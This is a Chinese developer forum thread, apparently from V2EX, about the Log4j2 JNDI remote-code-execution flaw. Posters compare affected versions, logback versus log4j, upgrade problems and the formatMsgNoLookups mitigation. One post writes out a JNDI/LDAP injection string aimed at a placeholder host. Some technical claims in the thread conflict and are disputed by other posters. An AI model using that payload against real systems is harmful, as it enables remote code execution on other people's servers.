颤抖吧 Javaer， log4j 史诗级漏洞

还是转向 logback 吧

这个漏洞本不应该被直接公布的，但利用过于简单，昨晚成了脚本小子的狂欢

这周值班一大早被呼起来屏蔽这个问题 绝了(╯°□°）╯︵ ┻━┻

全线服务全都是 log4j2 ，GG

这危害也太大了，老哥有原文吗？求分享

还好用的 logback

昨天美团崩溃也是因为这个？

别慌，只有低版本能盲打，高版本没那么好利用。看着吓人也只是 dnslog 而已

@pigspy logback 依赖 log4j 哦

还有，许多知名组件也用到了 log4j ，如 Apache Struts2 ，Apache Solr ，Apache Flink ，Apache Druid 等等

看了一下公司的屎山。还好只有官网是 Java ，log4j 还是远古版本，不知道升上来会带来哪些副作用...

@Archeb 是的，高版本 jdk 默认禁用了远程加载，需要寻找本地 Gadget

只有写在 format string 里才能触发，作为参数传入则不会。而我们一般不会直接把日志内容写到 format string 中，所以不必慌。

还在用 log4j 1

仔细看了一下，屎山用的远古版本不受影响，美滋滋。

绝望的打出 GG

之前服务器上是 java 程序在跑，腾讯云每隔一段时间就告警我们 jar 包有安全风险，需要升级，不然就停止服务，折腾几次后，我们换了 golang ，后面就没这个烦恼了

@qq1340691923 #17 艹 这不只是让腾讯云没法检测而已嘛。。。

还好用的 spring boot 自带的 logback

@itechnology #19 spring boot 自带 log4j 版本是 2.14.1

看了下公司项目，屎山都是 log4j1 ，新一点的都是 slf4j 了，没用到 log4j2

比较奇怪，为什么搜不到英语报道

@midasfree 一大早不错了，昨天晚上一点多被安全叫醒处理...

@cheng6563 slf4j 只是上层接口阿，得看实现层是什么吧

@qq1340691923 这个只是把问题掩盖了，并不是说 go 的程序就一定安全呀！

用老版本反而躲过一劫

@Archeb 不要迷之自信，低估了这个漏洞的危害。

@dko 修肯定得修

有人复现了吗

幸好是内网应用，根本不慌。

哈人


早上看见群里在问，好快啊，不过这老项目是 1.x 的，躲过一劫

@supuwoerc 1.x 问题更多吧。。

@cheng6563 看到这条回复给我整乐了~

${jndi:ldap://xxxxx.xxxx.xxxx/xxxxxx}

项目用的 elasticsearch 里面的 log4j 版本刚好在范围内，好在是内网

哈哈哈哈哈苹果到现在还没修复

太离谱了, 这是一个日志框架不该出现的 bug. 也许正确的应对方法不是升级或是改什么配置, 而是不要使用 log4j2 和这个作者开发的其他框架.

@conhost
是我记岔了？ logback 依赖了 log4j ?

@aguesuka “这个作者”？？

logback 依赖不是 slf4j 嘛？还是 slf4j 底层是用 log4j 实现的？

已经把文章发到群里面了，让公司大佬们处理吧

@pigspy 他可能说的是桥接器

按道理... 这个默认不是关的吗...

linkedin 也没修复

写个日志都不安全，牛逼啊

@conhost logback 和 log4j 是独立的

@conhost 这怎么可能，那 logback 作者离开 log4j 干嘛?

@aguesuka 阿里的 fastjson 也有过高危漏洞，建议别用阿里的任何东西。
二极管思维能不能消停点

@jsjjdzg slf4j 只是上层接口，没有具体实现阿，怎么会有用 log4j 实现这一说

@conhost https://mvnrepository.com/artifact/ch.qos.logback/logback-classic/1.2.7
不是吧，测试有依赖的 log4j1 ，编译没有依赖

颤抖吧...

@Crystal8899 https://github.com/apache/logging-log4j2/blob/b93cdf94167691cf509c15f69f3857abaaa80765/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java
https://github.com/apache/logging-log4j2/blob/b93cdf94167691cf509c15f69f3857abaaa80765/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/JndiLookup.java
https://github.com/apache/logging-log4j2/blob/b93cdf94167691cf509c15f69f3857abaaa80765/log4j-core/src/test/java/org/apache/logging/log4j/core/lookup/JndiLookupTest.java

完全没有 jndi 注入的意识.

@aguesuka
logstash 也有引用，elk 不打算用了？

@sagaxu #13 确认了一下 参数传入也会触发

怎么升级呢，最新的 log4j 2.15.0 ,有一个包需要 jdk9 。 我们还在用 jdk8

@pkoukk 像大家一起不用 Struts 一样不用它

@chawuchiren 顺便把 jdk 也升了(

@zmxnv123 HN 热贴了还叫没报道？ https://news.ycombinator.com/item?id=29504755

笑死 我们手忙脚乱查了一遍得出结论，log4j 版本太低，没这个漏洞

苹果还没修复, 不知道服务器上弹出多少个计算器了

小团体的群里，大厂的小伙伴是连夜修复，我们公司白天没人提，发到群里了没激起一点水花~

什么叫稳，版本越老反而越稳，哈哈

@ohwind I try to follow a rule with libraries: if a library causes more trouble than the implementation effort it would take to recreate its functionality from scratch (or rather, the portion of its funcitonality that is used in practice), then it's time to purge that library from projects and never use it again.
The part of log4j functionality that gets used in practice, most of the time, is just a wrapper around printf which adds a timestamp and a log-level. This is very quick and easy to write. A library in this role should have zero RCEs, ever in its entire lifetime, or it is unfit for purpose.

这不是我一个人的 idea

Windows 漏洞有多少？大家都不要用微软了， 颤抖吧

怎么才能学习复现一下 有没有指点一下路子的

log4j2.formatMsgNoLookups=true

@ipuhua windows 的漏洞起码不是在输入框写个${} 就能触发的

@buliugu 我记得 logback 默认依赖 log4j 的吧，虽然可以换引擎

现在上线了 RC2 可以暂时修复 但是可能还会被绕过

@James369
@tabris17
@iold
老版的好像也有问题，躲不过加班的。。。

log4j github 仓库下载下来解压怎么是源码啊，还得自己编译打包成 jar ？

纯云
logback 只是测试依赖用有到 log4j ，应该不受影响。
spring-boot-starter-logging 通过 log4j-to-slf4j 间接引入了 log4j-api ，只是接口层，应该也不受影响。

@feelinglucky 。。。你记错了吧

终于知道苹果的登录为什么这么慢了。
因为每一次登录请求，都会在美国的服务器上跑程序。

@NULL2020 #72 是的 因为还没正式发布

fastjson 确实挺好用的，我个人觉的源码写的很乱，动不动就爆漏洞，阿里的东西真的要慎用！

生活不能太平静，网络也一样，哈哈

java 怎么总能搞出点新花样。fastjson 一个序列化库能搞出来 rce ，log4j2 一个日志库也能搞出来 rce

感觉 JAVA 因其强大，它的库总是倾向于做得多，内部搞点魔法，用起来方便；然后代码多了就容易出问题。

@aguesuka intel 的 CPU 也有漏洞，建议也别用了

@littlewing 滑坡谬误, 看 64 楼

@Mithril #71 是的，后续已经确认 1.x 也受影响，而且 1.x 已经结束生命周期了。哎，非 Java boy, 难受啊，这么大的跨度，肯定不是升级个依赖就能解决的。

rc2 也影响

@littlewing 虽然 log4j 性能很好,水平很高, 但是就单单打个日志的功能我觉得以大多数人的水平都能做个勉强能用的出来, ,至于上面的 windows 和 CPU,我反正是做不了.

颤抖个啥，这不是又有收维护费的理由了嘛

CORRECTION: log4j 1.x contains a JMS Appender which can use JNDI. So I would say that, yes, log4j 1.x is also impacted by this vulnerability

上面看你们一顿乱说，也没人贴怎么复现啊

服务器设置 cron job 每 30 秒运行 killall java ， 防微杜渐。

内网应用不慌

@avastms #89 拔网线，完美解决

现在 1.x 也受影响了,而且不给升级
https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126

泥潭也有那么多人分不清日志接口框架和日志实现框架的区别么？

logging-log4j2-log4j-2.15.0-rc2.tar.gz
你们是如何编译成功的，用的这个./mvnw clean package -DskipTest 命令，提示 [Failed to execute goal org.apache.maven.plugins:maven-toolchains-plugin:1.1:toolchain (default) on project log4j-api-java9]
jdk 版本是 17

@gadfly3173 #76 特么的，自己还得装个 JDK9 吗？


@aaa5838769 #94 同样的问题

@Seayon 已经完美复现

@jwh199588 怎么复现的，传入的参数写什么

我把 java9 相关的全部删了

System.out.println 保平安

@aguesuka 你不用库没问题，你可以去找一个完美无瑕的库去用，请问你如何得出的不用”作者开发的其他框架“这个结论？